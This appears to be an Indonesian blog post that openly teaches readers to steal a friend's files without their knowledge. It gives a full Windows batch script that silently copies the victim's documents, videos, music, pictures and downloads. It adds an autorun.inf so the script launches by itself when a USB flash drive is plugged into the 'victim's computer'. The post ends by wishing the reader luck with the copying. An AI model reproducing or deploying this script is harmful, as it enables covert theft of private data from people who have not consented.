di asumsikan anda ingin mencopy file teman anda tanpa sepengetahuannya, bahasa kasarnya mencuri data :D
copy file di bawah ini dengan nama terserahanda.bat
atur tulisan yang berwarnah merah sesuaikan dengan tempat file yang akan anda copy
Kemudian agar file tersebut berjalan secara otomatis kt perlu membuat file autorun copy script dibawah save dengan nama autorun.inf@echo off
:CHECK
if not exist "%homedrive%\Copied_files" md "%homedrive%\Copied_files"
if exist "%systemdrive%\Documents and Settings" goto COPIER
goto ERROR
:COPIER
if not exist "%homedrive%\Copied_files\%computername%" md "%homedrive%\Copied_files\%computername%"
if not exist "%homedrive%\Copied_files\%computername%\VIDEOS" md "%homedrive%\Copied_files\%computername%\VIDEOS"
if not exist "%homedrive%\Copied_files\%computername%\PICTURES" md "%homedrive%\Copied_files\%computername%\PICTURES"
if not exist "%homedrive%\Copied_files\%computername%\MUSIC" md "%homedrive%\Copied_files\%computername%\MUSIC"
if not exist "%homedrive%\Copied_files\%computername%\DOWNLOADS" md "%homedrive%\Copied_files\%computername%\DOWNLOADS"
copy /y "%userprofile%\My Documents\*.*" "%homedrive%\Copied_files\%computername%"
copy /y "%userprofile%\My Documents\My Videos" "%homedrive%\Copied_files\%computername%\VIDEOS"
copy /y "%userprofile%\My Documents\My Music" "%homedrive%\Copied_files\%computername%\MUSIC"
copy /y "%userprofile%\My Documents\My Pictures" "%homedrive%\Copied_files\%computername%\PICTURES"
copy /y "%userprofile%\My Documents\Downloads" "%homedrive%\Copied_files\%computername%\DOWNLOADS"
MSG %username% "DONE!"
exit
:ERROR
exit
[autorun]
Open=Filename.bat
Action=File Copier
Simpan kedua file tersebut ke flash disk anda, dan colokkan di komputer korban anda, dan file tersebut akan bekerja seperti ini ..
Selamat mencopy data good luck ..
Tidak ada komentar:
Posting Komentar